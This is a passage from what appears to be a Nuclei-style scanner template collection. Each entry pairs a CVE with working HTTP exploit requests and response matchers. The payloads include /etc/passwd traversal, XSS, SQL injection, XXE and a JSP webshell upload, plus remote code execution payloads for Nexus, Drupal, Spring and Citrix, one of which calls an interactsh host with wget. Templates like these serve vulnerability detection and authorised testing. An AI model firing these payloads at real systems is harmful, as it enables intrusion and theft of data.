Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17503","info":{"name":"Kirona Dynamic Resource Scheduler - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osm/REGISTER.cmd","{{BaseURL}}/osm_tiles/REGISTER.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DEBUGMAPSCRIPT=TRUE","@echo off"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10405","info":{"name":"Jenkins <=2.196 - Cookie Exposure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","JSESSIONID"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2019-3402","info":{"name":"Jira < 8.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'<script>alert(1)</script>' does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12962","info":{"name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/index.php"],"headers":{"Accept-Language":";alert(document.domain)//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var detectedLanguage = ';alert(document.domain)//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8937","info":{"name":"HotelDruid 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain)</script>\"><input"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8982","info":{"name":"Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7238","info":{"name":"Sonatype Nexus Repository Manager  <3.15.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /service/extdirect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\n\n{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055';   y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\n    y,\\n   'Exploit.Test234',\\n    z.getBytes('latin1'),    0,\\n    3054\\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1010287","info":{"name":"Timesheet Next Gen <=1.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /timesheet/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>javascript:alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12987","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://{{interactsh-url}}%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-9670","info":{"name":"Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /Autodiscover/Autodiscover.xml HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!DOCTYPE xxe [\n<!ELEMENT name ANY >\n<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n<Request>\n<EMailAddress>aaaaa</EMailAddress>\n<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\n</Request>\n</Autodiscover>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","Problem accessing"],"condition":"and"},{"type":"status","status":[503]}]}]},{"id":"CVE-2019-10232","info":{"name":"Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1","{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["-MariaDB-","Start unlock script"],"condition":"and"}],"extractors":[{"type":"regex","regex":["[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"],"part":"body"}]}]},{"id":"CVE-2019-16278","info":{"name":"nostromo 1.9.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1\nHost: {{Hostname}}\n\necho\necho\ncat /etc/passwd 2>&1\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-12314","info":{"name":"Deltek Maconomy 2.2.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2000-0114","info":{"name":"Microsoft FrontPage Extensions Check (shtml.dll)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_vti_inf.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["_vti_bin/shtml.dll"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000856","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /segments/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test\n","GET /segments/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16670","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/user/values.xml?var=STATUS"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["<values><variable><id>","Reader.STATUS"],"condition":"and"}]}]},{"id":"CVE-2018-7600","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\nReferer:  {{Hostname}}/user/register\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663\n\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#post_render][]\"\n\npassthru\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#type]\"\n\nmarkup\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#markup]\"\n\ncat /etc/passwd\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"form_id\"\n\nuser_register_form\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"_drupal_ajax\"\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18777","info":{"name":"Microstrategy Web 7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6910","info":{"name":"DedeCMS 5.7 - Path Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/include/downmix.inc.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["downmix.inc.php","Call to undefined function helper()"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14918","info":{"name":"LOYTEC LGATE-902 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18608","info":{"name":"DedeCMS 5.7 SP2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>","DedeCMS Error Warning!"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16139","info":{"name":"BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>prompt(document.domain)</script>.xrf"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20462","info":{"name":"WordPress JSmol2WP <=1.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9161","info":{"name":"PrismaWEB - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/scripts/login_par.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["txtChkUser","txtChkPassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7653","info":{"name":"YzmCMS v3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","YzmCMS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5715","info":{"name":"SugarCRM 3.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["&\"/><script>alert(1)</script>=&\"><< Back</a><br><br>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20011","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/category.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes=\n","GET /assets/categories.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-14574","info":{"name":"Django - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//www.interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://www.interact.sh","Location: http://www.interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2018-3167","info":{"name":"Oracle E-Business Suite - Blind SSRF","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/OA_HTML/lcmServiceController.jsp"],"body":"<!DOCTYPE root PUBLIC \"-//B/A/EN\" \"http://interact.sh\">","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unexpected text in DTD"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17153","info":{"name":"Western Digital MyCloud NAS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /web/google_analytics.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: isAdmin=1; username=admin;\n\ncmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23\n"],"matchers":[{"type":"dsl","dsl":["regex(\"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)\", body)","contains(body, \"ganalytics\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2018-1207","info":{"name":"Dell iDRAC7/8 Devices - Remote Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login?LD_DEBUG=files"],"matchers":[{"type":"word","part":"response","words":["calling init: /lib/"]}]}]},{"id":"CVE-2018-19287","info":{"name":"WordPress Ninja Forms <3.3.18 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date=\"><img+src%3Dx+onerror%3Dalert%28document.domain%29%3B%2F%2F&end_date&filter_action=Filter&paged=1&action2=-1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Begin Date\" value=\"\\\"><img src=x onerror=alert(document.domain);//\">"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19751","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/ssl-fields/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test\n","GET /admin/ssl-fields/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19137","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&really_del"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000600","info":{"name":"Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-15961","info":{"name":"Adobe ColdFusion - Unrestricted File Upload Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------24464570528145\n\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\nContent-Type: image/jpeg\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2018-15961\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"path\"\n\n{{randstr}}.jsp\n-----------------------------24464570528145--\n","GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["ddbb3e76f92e78c445c8ecb392beb225"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6200","info":{"name":"vBulletin - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirector.php?url=https://interact.sh","{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<meta http-equiv=\"refresh\" content=\"0; URL=https://interact.sh\">"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17431","info":{"name":"Comodo Unified Threat Management Web Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n","GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Configuration has been altered"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15535","info":{"name":"Responsive FileManager <9.13.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1273","info":{"name":"Spring Data Commons - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /account HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nContent-Type: application/x-www-form-urlencoded\n\nname[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}}\n"],"payloads":{"command":["cat /etc/passwd","type C:\\/Windows\\/win.ini"]},"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"}]}]},{"id":"CVE-2018-3238","info":{"name":"Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 